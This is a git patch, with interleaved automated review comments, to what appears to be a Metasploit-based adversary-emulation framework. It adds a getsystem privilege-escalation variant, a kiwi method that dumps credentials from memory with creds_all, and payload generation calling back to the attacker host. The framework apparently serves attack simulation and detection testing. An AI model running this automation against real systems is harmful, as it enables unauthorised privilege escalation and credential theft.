From 7bce52b02ab3c3794c8a3051dc6aa433ea5aa92c Mon Sep 17 00:00:00 2001
From: Thorsten Sick
Date: Fri, 17 Sep 2021 11:37:50 +0200
Subject: [PATCH] Fixing Metasploit getsystem
---
 app/metasploit.py | 78 +++++++++++++++++--
 .../metasploit_getsystem.py | 13 +++-
 2 files changed, 82 insertions(+), 9 deletions(-)
diff --git a/app/metasploit.py b/app/metasploit.py
index 829eac6..0985ba1 100644
--- a/app/metasploit.py
+++ b/app/metasploit.py
@@ -471,7 +471,7 @@ class MetasploitInstant(Metasploit):
 tactics=tactics,
 tactics_id=tactics_id,
 ttp=ttp)
- res = self.meterpreter_execute_on([command], target)
+ res = self.meterpreter_execute_on([command], target, delay=5)
 print(f"Result of migrate {res}")
 self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
 target=target.get_ip(),
@@ -553,19 +553,27 @@ class MetasploitInstant(Metasploit):
 result=res)
 return res
- def getsystem(self, target, **kwargs):
- """ Do a network discovery on the target """
+ def getsystem(self, target, variant=0, **kwargs):
+ """ Do a network discovery on the target
+
+ @param target: Target to attack
+ @param variant: Variant of getsystem to use. 0 is auto, max is 3
+ """
 command = "getsystem"
 ttp = "????" # It uses one out of three different ways to elevate privileges.
 tactics = "Privilege Escalation"
 tactics_id = "TA0004"
 description = """
-Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:
-* named pipe impersonation using cmd
-* named pipe impersonation using a dll
-* token duplication
+Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n
+0) auto \n
+1) named pipe impersonation using cmd \n
+2) named pipe impersonation using a dll \n
+3) token duplication\n
 """
+
+ if variant != 0:
+ command += f" -t {variant}"
 # https://docs.rapid7.com/metasploit/meterpreter-getsystem/
 self.attack_logger.vprint(
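Review bot: The added `delay=5` on the meterpreter_execute_on call is a bare magic number, while the kiwi method added later in this commit reads its wait from `kwargs.get("delay", 10)`; if this method also accepts **kwargs (its signature is outside the hunk) the same pattern, `delay=kwargs.get("delay", 5)`, would keep the two consistent and let callers tune the wait. A short comment stating why a wait is needed here at all would help the next reader, e.g. `# presumably the migrated session needs a moment before its output is readable -- confirm`. The enclosing method starts and ends outside the hunk.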
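Review bot: `variant` is spliced straight into the meterpreter command by `command += f" -t {variant}"` and nothing enforces the 0..3 range the docstring promises, even though the plugin hunk feeds it from configuration (`self.conf['variant']`); a guard such as `variant = int(variant)` followed by `if not 0 <= variant <= 3: raise ValueError(f"getsystem variant must be 0..3, got {variant}")` would reject anything else before it reaches the session. The docstring summary still reads "Do a network discovery on the target", which does not describe this method — something like `""" Elevate the meterpreter session from local administrator to SYSTEM` fits what the description string says it does. The `\n` escapes inside the triple-quoted description add a second newline after each line that already ends with a real line break, so the logged description will be double-spaced; dropping them restores the previous layout. Finally, `ttp = "????"` could be replaced with the ATT&CK technique for token impersonation/theft (T1134.001 is the usual mapping for getsystem's named-pipe and token-duplication variants) so the attack log stays searchable; getsystem's body continues past the end of the hunk.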
@@ -762,3 +770,59 @@ Uploading new files to the target. Can be config files, tools, implants, ...
 logid=logid,
 result=res)
 return res
+
+ def kiwi(self, target, variant="creds_all", **kwargs):
+ """ Kiwi is the modern equivalent to mimikatz
+
+ @param target: target being attacked
+ @param variant: kiwi command being used
+ """
+
+ ttp = "t1003"
+ tactics = "Credential access"
+ tactics_id = "TA0006"
+ description = """
+Accessing user credentials in memory
+"""
+
+ res = []
+
+ self.attack_logger.vprint(
+ f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1)
+
+ # We need system privileges
+ self.getsystem(target, 0, **kwargs)
+
+ # Kiwi needs to be loaded
+ command = "load kiwi "
+ res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
+
+ # Executing kiwi
+ command = f"{variant} "
+
+ self.attack_logger.vprint(
+ f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
+
+ logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
+ target=target.get_ip(),
+ metasploit_command=command,
+ ttp=ttp,
+ name="kiwi",
+ description=description,
+ tactics=tactics,
+ tactics_id=tactics_id,
+ situation_description=kwargs.get("situation_description",
+ None),
+ countermeasure=kwargs.get("countermeasure", None)
+ )
+ res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10))
+
+ self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
+ target=target.get_ip(),
+ metasploit_command=command,
+ ttp=ttp,
+ logid=logid,
+ result=res)
+
+ print(res)
+ return res
diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
index d05dfa5..8a32fc9 100644
--- a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
+++ b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py
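Review bot: The result of `self.getsystem(target, 0, **kwargs)` is thrown away, so when elevation fails the method still loads kiwi and runs `creds_all` without SYSTEM and the only trace is whatever error text ends up in `res`; at least the getsystem output should be appended to `res` (or checked, if meterpreter_execute_on's return makes success detectable — its signature is not in the diff) so the logged result explains a failed dump. The harvested credential material is then written to stdout by the trailing `print(res)` on top of being recorded through stop_metasploit_attack, which duplicates sensitive data into console logs; that line looks like leftover debugging and should go (the migrate hunk's `print(f"Result of migrate {res}")` is the same pattern). `variant` becomes the meterpreter command verbatim via `command = f"{variant} "`, so a small allowlist of the kiwi sub-commands this method supports, checked before the call, would be safer than free text arriving through kwargs. The delay is passed positionally as `kwargs.get("delay", 10)` where the migrate hunk uses the keyword `delay=5`; writing `delay=kwargs.get("delay", 10)` here too protects against the value binding to the wrong parameter if the signature changes. `ttp = "t1003"` is lower-case while `tactics_id = "TA0006"` is upper-case — ATT&CK IDs are canonically written `T1003`, and mixed case will hurt matching in the attack log.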
@@ -4,6 +4,7 @@ from plugins.base.attack import AttackPlugin
 from app.metasploit import MetasploitInstant
+import socket
 class MetasploitGetsystemPlugin(AttackPlugin):
@@ -37,12 +38,20 @@ class MetasploitGetsystemPlugin(AttackPlugin):
 attacker=self.attacker_machine_plugin,
 username=self.metasploit_user)
+ ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
+
 metasploit.smart_infect(target,
 payload=payload_type,
- payload_name=payload_name,
- architecture="x64")
+ architecture="x64",
+ platform="windows",
+ lhost=ip,
+ format="exe",
+ outfile=payload_name)
+
+ # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70
 metasploit.getsystem(target,
+ variant=self.conf['variant'],
 situation_description="This is an example standalone attack step. In real world attacks there would be events before and after",
 countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection."
 )
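Review bot: `import socket` is appended after the project imports; the standard-library import conventionally forms its own group above `from plugins.base.attack import AttackPlugin`, separated by a blank line, so the import block stays grouped stdlib / local. An isort-style linter would flag the current order, and moving the one line up costs nothing.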
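Review bot: `variant=self.conf['variant']` turns a previously optional setting into a hard requirement — a configuration without that key now raises KeyError before the attack step runs, whereas getsystem itself defaults to 0 (auto); `variant=self.conf.get('variant', 0)` keeps the old behaviour for existing configs. `socket.gethostbyname(self.attacker_machine_plugin.get_ip())` raises `socket.gaierror` when the value is a hostname that does not resolve and is a pass-through when it is already an IP literal, so a one-line comment stating which form get_ip() returns, plus a `try/except socket.gaierror` that reports the unresolved attacker address, would make the `lhost` handed to smart_infect predictable. The `# TODO:` line is only a link into elevate.c and says nothing about what remains to be done; a few words naming the intended follow-up would make it actionable. The enclosing method starts before the hunk.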